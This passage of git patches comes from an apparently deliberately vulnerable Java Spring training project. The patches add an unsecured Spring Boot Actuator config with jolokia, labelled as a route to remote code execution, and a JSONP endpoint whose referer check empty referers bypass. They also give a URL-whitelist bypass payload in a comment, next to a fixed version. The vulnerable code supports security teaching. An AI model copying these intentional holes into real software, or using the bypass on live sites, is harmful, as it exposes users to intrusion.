+++ b/pom-extra.xml
@@ -126,7 +126,14 @@
 
     </dependencies>
 
-
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+        </plugins>
+    </build>
 
 
 </project>
\ No newline at end of file
diff --git a/pom-idea.xml b/pom-idea.xml
index 8f44e785..44a3b87d 100644
--- a/pom-idea.xml
+++ b/pom-idea.xml
@@ -112,7 +112,14 @@
 
     </dependencies>
 
-
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+        </plugins>
+    </build>
 
 
 </project>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 8f44e785..fd474f4f 100644
--- a/pom.xml
+++ b/pom.xml
@@ -112,7 +112,15 @@
 
     </dependencies>
 
-
+    <!-- jar -->
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+        </plugins>
+    </build>
 
 
 </project>
\ No newline at end of file

From d1963da5ad5396bf7b1cde36560c98fbe50935bf Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 4 Mar 2019 11:24:24 +0800
Subject: [PATCH 012/108] Actuators to RCE

---
 java-sec-code.iml                          | 74 ++++++++++++++++++++++
 pom.xml                                    | 31 +++++++++
 src/main/java/org/joychou/Application.java |  2 +
 src/main/resources/application.properties  |  3 +
 src/main/resources/logback.xml             | 12 ++++
 5 files changed, 122 insertions(+)
 create mode 100644 src/main/resources/application.properties
 create mode 100644 src/main/resources/logback.xml

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 76d1049c..44e9b58d 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -90,5 +90,79 @@
     <orderEntry type="library" name="Maven: cglib:cglib:2.2.2" level="project" />
     <orderEntry type="library" name="Maven: asm:asm:3.3.1" level="project" />
     <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.3" level="project" />
+    <orderEntry type="library" name="Maven: org.jolokia:jolokia-core:1.6.0" level="project" />
+    <orderEntry type="library" name="Maven: com.googlecode.json-simple:json-simple:1.1.1" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-actuator:1.5.1.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-actuator:1.5.1.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter-netflix-eureka-client:1.4.0.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter:1.1.3.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-context:1.1.3.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-crypto:4.2.1.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-commons:1.1.3.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-rsa:1.0.3.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.bouncycastle:bcpkix-jdk15on:1.55" level="project" />
+    <orderEntry type="library" name="Maven: org.bouncycastle:bcprov-jdk15on:1.55" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-netflix-core:1.2.0.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-netflix-eureka-client:1.2.0.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: com.netflix.eureka:eureka-client:1.4.11" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.jettison:jettison:1.3.7" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: stax:stax-api:1.0.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-eventbus:0.3.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-infix:0.3.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: commons-jxpath:commons-jxpath:1.3" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: joda-time:joda-time:2.9.7" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.antlr:antlr-runtime:3.4" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.antlr:stringtemplate:3.2.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: antlr:antlr:2.7.7" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.code.gson:gson:2.8.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.apache.commons:commons-math:2.2" level="project" />
+    <orderEntry type="library" name="Maven: com.netflix.archaius:archaius-core:0.7.4" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: javax.ws.rs:jsr311-api:1.1.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.servo:servo-core:0.10.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.servo:servo-internal:0.10.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey:jersey-core:1.19.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey:jersey-client:1.19.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey.contribs:jersey-apache-client4:1.19.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject:guice:4.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: javax.inject:javax.inject:1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: aopalliance:aopalliance:1.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator-api:1.12.10" level="project" />
+    <orderEntry type="library" name="Maven: com.netflix.eureka:eureka-core:1.4.11" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator:1.12.10" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator-core:1.12.10" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-multibindings:4.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-grapher:4.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-assistedinject:4.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.ow2.asm:asm:5.0.4" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:woodstox-core-asl:4.4.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: javax.xml.stream:stax-api:1.0-2" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:stax2-api:3.1.4" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter-netflix-archaius:1.4.0.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: commons-configuration:commons-configuration:1.8" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter-netflix-ribbon:1.4.0.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon:2.2.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.ribbon:ribbon-transport:2.2.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.reactivex:rxnetty-contexts:0.4.9" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.reactivex:rxnetty-servo:0.4.9" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.hystrix:hystrix-core:1.5.5" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.hdrhistogram:HdrHistogram:2.1.9" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.reactivex:rxnetty:0.4.9" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-codec-http:4.0.27.Final" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-codec:4.0.27.Final" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-handler:4.0.27.Final" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-transport-native-epoll:4.0.27.Final" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-common:4.0.27.Final" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-buffer:4.0.27.Final" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-transport:4.0.27.Final" level="project" />
+    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-core:2.2.0" level="project" />
+    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-httpclient:2.2.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-commons-util:0.1.1" level="project" />
+    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-loadbalancer:2.2.0" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-statistics:0.1.1" level="project" />
+    <orderEntry type="library" name="Maven: io.reactivex:rxjava:1.1.10" level="project" />
+    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-eureka:2.2.0" level="project" />
+    <orderEntry type="library" name="Maven: com.thoughtworks.xstream:xstream:1.4.9" level="project" />
+    <orderEntry type="library" name="Maven: xmlpull:xmlpull:1.1.3.1" level="project" />
+    <orderEntry type="library" name="Maven: xpp3:xpp3_min:1.1.4c" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index fd474f4f..f7532932 100644
--- a/pom.xml
+++ b/pom.xml
@@ -110,8 +110,39 @@
             <version>3.2</version>
         </dependency>
 
+        <!-- SpringBoot Actuator命令执行的库 -->
+        <dependency>
+            <groupId>org.jolokia</groupId>
+            <artifactId>jolokia-core</artifactId>
+            <version>1.6.0</version>
+        </dependency>
+
+        <!-- 添加SpringBoot Actuator-->
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-actuator</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework.cloud</groupId>
+            <artifactId>spring-cloud-starter-netflix-eureka-client</artifactId>
+            <version>1.4.0.RELEASE</version>
+        </dependency>
+
     </dependencies>
 
+    <dependencyManagement>
+        <dependencies>
+            <dependency>
+                <groupId>org.springframework.cloud</groupId>
+                <artifactId>spring-cloud-dependencies</artifactId>
+                <version>Camden.RELEASE</version>
+                <type>pom</type>
+                <scope>import</scope>
+            </dependency>
+        </dependencies>
+    </dependencyManagement>
+
     <!-- jar -->
     <build>
         <plugins>
diff --git a/src/main/java/org/joychou/Application.java b/src/main/java/org/joychou/Application.java
index 6a6fbc6e..3b05f723 100644
--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -4,9 +4,11 @@
 import org.springframework.boot.autoconfigure.SpringBootApplication;
 import org.springframework.boot.builder.SpringApplicationBuilder;
 import org.springframework.boot.web.support.SpringBootServletInitializer;
+import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
 @SpringBootApplication
+@EnableEurekaClient
 public class Application extends SpringBootServletInitializer {
 
     @Override
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
new file mode 100644
index 00000000..791531ed
--- /dev/null
+++ b/src/main/resources/application.properties
@@ -0,0 +1,3 @@
+
+# Spring Boot Actuator Vulnerable Config
+management.security.enabled=false
\ No newline at end of file
diff --git a/src/main/resources/logback.xml b/src/main/resources/logback.xml
new file mode 100644
index 00000000..4bda3a99
--- /dev/null
+++ b/src/main/resources/logback.xml
@@ -0,0 +1,12 @@
+<configuration>
+    <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
+        <withJansi>true</withJansi>
+        <encoder>
+            <pattern>[%thread] %highlight(%-5level) %cyan(%logger{15}) - %msg %n</pattern>
+        </encoder>
+    </appender>
+    <root level="info">
+        <appender-ref ref="STDOUT" />
+    </root>
+    <jmxConfigurator/>
+</configuration>
\ No newline at end of file

From af76c382c50d578508aa06f6f1f30b1de4cb219e Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 4 Mar 2019 11:26:45 +0800
Subject: [PATCH 013/108] update readme

---
 README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index cabdc572..e32e9b2e 100644
--- a/README.md
+++ b/README.md
@@ -24,7 +24,7 @@
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java)
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
-
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
 
 ## 漏洞说明
 
@@ -35,6 +35,7 @@
 - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
+- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 

From 4c21c97e28b091a83c113591bceb84eaf5afb991 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 6 Mar 2019 15:13:26 +0800
Subject: [PATCH 014/108] bypass using URL class to getHost

---
 .../org/joychou/controller/URLWhiteList.java  | 36 +++++++++++++++++--
 src/main/java/org/joychou/utils/Security.java |  7 +++-
 src/main/resources/application.properties     |  3 +-
 .../{logback.xml => logback-online.xml}       |  0
 4 files changed, 41 insertions(+), 5 deletions(-)
 rename src/main/resources/{logback.xml => logback-online.xml} (100%)

diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index 852fea6a..98bf1089 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -7,6 +7,7 @@
 import org.springframework.web.bind.annotation.ResponseBody;
 
 import javax.servlet.http.HttpServletRequest;
+import java.net.URI;
 import java.net.URL;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
@@ -89,17 +90,21 @@ public String indexOf(HttpServletRequest request) throws Exception{
         }
     }
 
-    // 安全代码
-    @RequestMapping("/seccode")
+    // URL类getHost方法被绕过造成的安全问题
+    // 绕过姿势：http://localhost:8080/url/seccode?url=http://www.taobao.com%23@joychou.com/, URL类getHost为joychou.com
+    // 直接访问http://www.taobao.com#@joychou.com/，浏览器请求的是www.taobao.com
+    @RequestMapping("/url")
     @ResponseBody
-    public String seccode(HttpServletRequest request) throws Exception{
+    public String urlVul(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
+        System.out.println("url:  " + url);
         URL u = new URL(url);
         // 判断是否是http(s)协议
         if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
             return "URL is not http or https";
         }
         String host = u.getHost().toLowerCase();
+        System.out.println("host:  " + host);
         // 如果非顶级域名后缀会报错
         String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
@@ -111,4 +116,29 @@ public String seccode(HttpServletRequest request) throws Exception{
     }
 
 
+    // 安全代码
+    @RequestMapping("/seccode")
+    @ResponseBody
+    public String seccode(HttpServletRequest request) throws Exception{
+        String url = request.getParameter("url");
+        System.out.println("url:  " + url);
+        URI uri = new URI(url);
+        URL u = new URL(url);
+        // 判断是否是http(s)协议
+        if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
+            return "URL is not http or https";
+        }
+        // 使用uri获取host
+        String host = uri.getHost().toLowerCase();
+        System.out.println("host:  " + host);
+
+        // 如果非顶级域名后缀会报错
+        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
+
+        if (rootDomain.equals(urlwhitelist)) {
+            return "URL is legal";
+        } else {
+            return "URL is illegal";
+        }
+    }
 }
diff --git a/src/main/java/org/joychou/utils/Security.java b/src/main/java/org/joychou/utils/Security.java
index f17de34d..4ccd78c0 100644
--- a/src/main/java/org/joychou/utils/Security.java
+++ b/src/main/java/org/joychou/utils/Security.java
@@ -1,6 +1,8 @@
 package org.joychou.utils;
 
 import com.google.common.net.InternetDomainName;
+
+import java.net.URI;
 import java.net.URL;
 
 public class Security {
@@ -11,12 +13,15 @@ public class Security {
     public static Boolean checkSafeUrl(String url, String[] urlwhitelist){
         try{
             URL u = new URL(url);
+            URI uri = new URI(url);
             // 判断是否是http(s)协议
             if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
                 System.out.println("The protocol of url is not http or https.");
                 return false;
             }
-            String host = u.getHost().toLowerCase();
+            // 使用uri获取host
+            String host = uri.getHost().toLowerCase();
+
             // 如果非顶级域名后缀会报错
             String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 791531ed..cdb84e53 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,3 +1,4 @@
 
 # Spring Boot Actuator Vulnerable Config
-management.security.enabled=false
\ No newline at end of file
+management.security.enabled=false
+logging.config=classpath:logback-online.xml
\ No newline at end of file
diff --git a/src/main/resources/logback.xml b/src/main/resources/logback-online.xml
similarity index 100%
rename from src/main/resources/logback.xml
rename to src/main/resources/logback-online.xml

From 3cd29c1426f97bcb0fd12194e53f9cece8564b66 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 6 Mar 2019 15:15:51 +0800
Subject: [PATCH 015/108] fix bug

---
 src/main/java/org/joychou/controller/URLWhiteList.java | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index 98bf1089..fb67e013 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -91,9 +91,9 @@ public String indexOf(HttpServletRequest request) throws Exception{
     }
 
     // URL类getHost方法被绕过造成的安全问题
-    // 绕过姿势：http://localhost:8080/url/seccode?url=http://www.taobao.com%23@joychou.com/, URL类getHost为joychou.com
+    // 绕过姿势：http://localhost:8080/url/urlVul?url=http://www.taobao.com%23@joychou.com/, URL类getHost为joychou.com
     // 直接访问http://www.taobao.com#@joychou.com/，浏览器请求的是www.taobao.com
-    @RequestMapping("/url")
+    @RequestMapping("/urlVul")
     @ResponseBody
     public String urlVul(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");

From d1b3d6b0cb08939b72f8249eda5f01366141bb2b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 9 Apr 2019 17:58:14 +0800
Subject: [PATCH 016/108] update jsonp

---
 .../java/org/joychou/controller/JSONP.java    | 23 ++++++++++---------
 1 file changed, 12 insertions(+), 11 deletions(-)

diff --git a/src/main/java/org/joychou/controller/JSONP.java b/src/main/java/org/joychou/controller/JSONP.java
index 67dda97e..b50ea530 100644
--- a/src/main/java/org/joychou/controller/JSONP.java
+++ b/src/main/java/org/joychou/controller/JSONP.java
@@ -39,17 +39,16 @@ private static String referer(HttpServletRequest request, HttpServletResponse re
     private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) {
         String referer = request.getHeader("referer");
         response.setHeader("Access-Control-Allow-Origin", "*");
-        if (null == referer) {
-            String callback = request.getParameter("callback");
-            return callback + "(" + info + ")";
-        } else {
-            Security sec = new Security();
-            if (!sec.checkSafeUrl(referer, urlwhitelist)) {
-                return "Referer is not safe.";
-            }
-            String callback = request.getParameter("callback");
-            return callback + "(" + info + ")";
+        Security sec = new Security();
+
+        // 如果referer不为空，并且referer不在安全域名白名单内，return error
+        // 导致空referer就会绕过校验。开发同学为了方便测试，不太喜欢校验空Referer
+        if (null != referer && !sec.checkSafeUrl(referer, urlwhitelist)) {
+            return "error";
         }
+
+        String callback = request.getParameter("callback");
+        return callback + "(" + info + ")";
     }
 
     // http://localhost:8080/jsonp/sec?callback=test
@@ -60,9 +59,11 @@ private static String sec(HttpServletRequest request, HttpServletResponse respon
         response.setHeader("Access-Control-Allow-Origin", "*");
         String referer = request.getHeader("referer");
         Security sec = new Security();
+
         if (!sec.checkSafeUrl(referer, urlwhitelist)) {
-            return "Referer is not safe.";
+            return "error";
         }
+
         String callback = request.getParameter("callback");
         return callback + "(" + info + ")";
     }

From 5b60e1525667c58a51599ced4703a4607f377518 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 23 Apr 2019 18:47:54 +0800
Subject: [PATCH 017/108] add upload file only picture

---
 java-sec-code.iml                             |  3 +-
 pom.xml                                       |  7 ++
 .../org/joychou/controller/FileUpload.java    | 93 ++++++++++++++++++-
 src/main/java/org/joychou/utils/Security.java | 27 +++++-
 src/main/resources/templates/uploadPic.html   | 13 +++
 5 files changed, 136 insertions(+), 7 deletions(-)
 create mode 100644 src/main/resources/templates/uploadPic.html

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 44e9b58d..2cf50e4e 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -12,7 +12,7 @@
       </configuration>
     </facet>
   </component>
-  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_6">
+  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
     <output url="file://$MODULE_DIR$/target/classes" />
     <output-test url="file://$MODULE_DIR$/target/test-classes" />
     <content url="file://$MODULE_DIR$">
@@ -164,5 +164,6 @@
     <orderEntry type="library" name="Maven: com.thoughtworks.xstream:xstream:1.4.9" level="project" />
     <orderEntry type="library" name="Maven: xmlpull:xmlpull:1.1.3.1" level="project" />
     <orderEntry type="library" name="Maven: xpp3:xpp3_min:1.1.4c" level="project" />
+    <orderEntry type="library" name="Maven: com.fasterxml.uuid:java-uuid-generator:3.1.4" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index f7532932..b2aa7838 100644
--- a/pom.xml
+++ b/pom.xml
@@ -129,6 +129,13 @@
             <version>1.4.0.RELEASE</version>
         </dependency>
 
+        <!-- 生成uuid -->
+        <dependency>
+            <groupId>com.fasterxml.uuid</groupId>
+            <artifactId>java-uuid-generator</artifactId>
+            <version>3.1.4</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index 947b9496..133ddb73 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -1,5 +1,6 @@
 package org.joychou.controller;
 
+import com.fasterxml.uuid.Generators;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -8,10 +9,16 @@
 import org.springframework.web.multipart.MultipartFile;
 import org.springframework.web.servlet.mvc.support.RedirectAttributes;
 
+import java.io.File;
+import java.io.FileOutputStream;
 import java.io.IOException;
 import java.nio.file.Files;
 import java.nio.file.Path;
 import java.nio.file.Paths;
+import java.util.UUID;
+
+import static org.joychou.utils.Security.isImage;
+
 
 /**
  * @author: JoyChou (joychou@joychou.org)
@@ -31,6 +38,11 @@ public String index() {
         return "upload"; // return upload.html page
     }
 
+    @GetMapping("/pic")
+    public String uploadPic() {
+        return "uploadPic"; // return uploadPic.html page
+    }
+
     @PostMapping("/upload")
     public String singleFileUpload(@RequestParam("file") MultipartFile file,
                                    RedirectAttributes redirectAttributes) {
@@ -52,15 +64,94 @@ public String singleFileUpload(@RequestParam("file") MultipartFile file,
         } catch (IOException e) {
             redirectAttributes.addFlashAttribute("message", "upload failed");
             e.printStackTrace();
-            return "uploadStatus";
+            return "redirect:/file/status";
         }
 
         return "redirect:/file/status";
     }
 
+    // only upload picture
+    @PostMapping("/upload/picture")
+    public String uploadPicture(@RequestParam("file") MultipartFile multifile,
+                                   RedirectAttributes redirectAttributes) throws Exception{
+        if (multifile.isEmpty()) {
+            // 赋值给uploadStatus.html里的动态参数message
+            redirectAttributes.addFlashAttribute("message", "Please select a file to upload");
+            return "redirect:/file/status";
+        }
+
+        // get suffix
+        String fileName = multifile.getOriginalFilename();
+        String Suffix = fileName.substring(fileName.lastIndexOf("."));
+
+        File excelFile = convert(multifile);
+
+        // security check
+        String picSuffixList[] = {".jpg", ".png", ".jpeg", ".gif", ".bmp"};
+        Boolean suffixFlag = false;
+        for (String white_suffix : picSuffixList) {
+            if (Suffix.toLowerCase().equals(white_suffix)) {
+                suffixFlag = true;
+                break;
+            }
+        }
+        if ( !suffixFlag || !isImage(excelFile) ) {
+            redirectAttributes.addFlashAttribute("message", "illeagl picture");
+            deleteFile(excelFile);
+            return "redirect:/file/status";
+        }
+
+
+        try {
+            // Get the file and save it somewhere
+            byte[] bytes = multifile.getBytes();
+            Path path = Paths.get(UPLOADED_FOLDER + multifile.getOriginalFilename());
+            Files.write(path, bytes);
+
+            redirectAttributes.addFlashAttribute("message",
+                    "You successfully uploaded '" + UPLOADED_FOLDER + multifile.getOriginalFilename() + "'");
+
+        } catch (IOException e) {
+            redirectAttributes.addFlashAttribute("message", "upload failed");
+            e.printStackTrace();
+            deleteFile(excelFile);
+            return "redirect:/file/status";
+        }
+
+        deleteFile(excelFile);
+        return "redirect:/file/status";
+    }
+
     @GetMapping("/status")
     public String uploadStatus() {
         return "uploadStatus";
     }
 
+    private void deleteFile(File... files) {
+        for (File file : files) {
+            if (file.exists()) {
+                file.delete();
+            }
+        }
+    }
+
+    /**
+     * @desc 不建议使用transferTo，因为原始的MultipartFile会被覆盖
+     * @url https://stackoverflow.com/questions/24339990/how-to-convert-a-multipart-file-to-file
+     * @param multiFile
+     * @return
+     * @throws Exception
+     */
+    private File convert(MultipartFile multiFile) throws Exception {
+        String fileName = multiFile.getOriginalFilename();
+        String suffix = fileName.substring(fileName.lastIndexOf("."));
+        UUID uuid = Generators.timeBasedGenerator().generate();
+
+        File convFile = new File(UPLOADED_FOLDER + uuid + suffix);
+        convFile.createNewFile();
+        FileOutputStream fos = new FileOutputStream(convFile);
+        fos.write(multiFile.getBytes());
+        fos.close();
+        return convFile;
+    }
 }
diff --git a/src/main/java/org/joychou/utils/Security.java b/src/main/java/org/joychou/utils/Security.java
index 4ccd78c0..d283d34c 100644
--- a/src/main/java/org/joychou/utils/Security.java
+++ b/src/main/java/org/joychou/utils/Security.java
@@ -2,6 +2,10 @@
 
 import com.google.common.net.InternetDomainName;
 
+import javax.imageio.ImageIO;
+import java.awt.image.BufferedImage;
+import java.io.File;
+import java.io.IOException;
 import java.net.URI;
 import java.net.URL;
 
@@ -10,8 +14,8 @@ public class Security {
      * @param url
      * @return 安全url返回true，危险url返回false
      */
-    public static Boolean checkSafeUrl(String url, String[] urlwhitelist){
-        try{
+    public static Boolean checkSafeUrl(String url, String[] urlwhitelist) {
+        try {
             URL u = new URL(url);
             URI uri = new URI(url);
             // 判断是否是http(s)协议
@@ -25,7 +29,7 @@ public static Boolean checkSafeUrl(String url, String[] urlwhitelist){
             // 如果非顶级域名后缀会报错
             String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
-            for (String whiteurl: urlwhitelist){
+            for (String whiteurl : urlwhitelist) {
                 if (rootDomain.equals(whiteurl)) {
                     return true;
                 }
@@ -33,10 +37,23 @@ public static Boolean checkSafeUrl(String url, String[] urlwhitelist){
 
             System.out.println("Url is not safe.");
             return false;
-        }catch (Exception e) {
+        } catch (Exception e) {
             System.out.println(e.toString());
             e.printStackTrace();
             return false;
         }
     }
-}
+
+
+    /**
+     * @param file
+     * @desc 判断文件内容是否是图片
+     */
+    public static boolean isImage(File file) throws IOException {
+        BufferedImage bi = ImageIO.read(file);
+        if (bi == null) {
+            return false;
+        }
+        return true;
+    }
+}
\ No newline at end of file
diff --git a/src/main/resources/templates/uploadPic.html b/src/main/resources/templates/uploadPic.html
new file mode 100644
index 00000000..ce056aa7
--- /dev/null
+++ b/src/main/resources/templates/uploadPic.html
@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html xmlns:th="http://www.thymeleaf.org">
+<body>
+
+<h3>file upload only picture</h3>
+
+<form method="POST" action="upload/picture" enctype="multipart/form-data">
+    <input type="file" name="file" /><br/><br/>
+    <input type="submit" value="Submit" />
+</form>
+
+</body>
+</html>

From 590891b895f256732de2b5fedbee91ad3164fd56 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 31 May 2019 11:46:09 +0800
Subject: [PATCH 018/108] add csrf

---
 README.md                                     |  2 ++
 java-sec-code.iml                             | 18 ++++++-----
 pom.xml                                       | 19 ++++++++++++
 src/main/java/org/joychou/Application.java    |  2 +-
 .../java/org/joychou/WebSecurityConfig.java   | 20 ++++++++++++
 .../java/org/joychou/controller/CSRF.java     | 31 +++++++++++++++++++
 .../java/org/joychou/controller/Test.java     | 25 +++++++++++++++
